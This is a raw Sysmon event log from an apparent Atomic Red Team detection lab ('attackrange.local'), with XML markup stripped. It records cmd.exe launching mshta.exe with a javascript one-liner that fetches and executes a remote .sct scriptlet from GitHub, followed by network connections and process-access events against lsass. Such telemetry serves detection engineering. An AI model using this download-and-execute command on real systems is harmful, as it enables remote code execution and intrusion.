16:56:30.288{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.288{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000002245122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:19.377{00000000-0000-0000-0000-000000000000}6296raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;<unknown process> 10341000x80000000000000002245121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.260{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.259{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.253{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=960F17926C1E94A9E3417AD32515E602,SHA256=8441058194D88BF4BB822F8ADD85A05482813053A35CD21492CC11D73D0ADFA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.242{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.242{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-6E3D-603E-04AB-00000000AD01}634814296C:\Windows\system32\cmd.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.005{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close() C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" 10341000x80000000000000002245109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.998{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-6E3D-603E-03AB-00000000AD01}66887752C:\Windows\system32\cmd.exe{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.997{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"" 23542300x80000000000000002245148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:31.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=683BA78431DBD3B1BDA3E4D8C3B0E191,SHA256=BF743C2FBE08BED94FA68FF5CFD0F049131F5B495C0F8212ED90A3F76BEB6AC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.362{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60195-false10.0.1.12-8000- 22542200x80000000000000002245146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.846{00000000-0000-0000-0000-000000000000}8280raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;<unknown process> 22542200x80000000000000002245145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.079{00000000-0000-0000-0000-000000000000}4224raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;<unknown process> 23542300x80000000000000002245150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:32.905{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6822E6EB021A4FCB7550EA1716ABACD,SHA256=6395B1C2E9AE967CD8AB9E51DE0CBE1F7BA5A11C9F4A47C2D31E4A54B5B2555C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.848{00000000-0000-0000-0000-000000000000}8280<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60197-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x80000000000000002245156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:33.676{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4F5EF6F0736073A15B77CB33DB75FE27,SHA256=C6F9E6E9291A3B58AAACC89BBFAD01D1515C080EC41FEEEEC032C9DA96ED3FF2,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002245155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:21.571{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\system32\mshta.exe 10341000x80000000000000002245154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:33.342{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002245153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:21.572{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-974.attackrange.local60198-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x80000000000000002245152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:33.061{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:33.061{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:36.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F2F577366B07EFC2FA5EED1568CCA7,SHA256=5BFB84423B4BDFDCDFECD80976301A28675A8AB4E4062D6F27D64CD2DD898081,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:36.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6F0EA573C871E21D0D7CB9785588134,SHA256=6079E6A83F288CF339BC1A9AF26F643EACEE22127A146270B2B52A49BBCD2154,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.190{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60199-false10.0.1.12-8000- 23542300x80000000000000002245157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 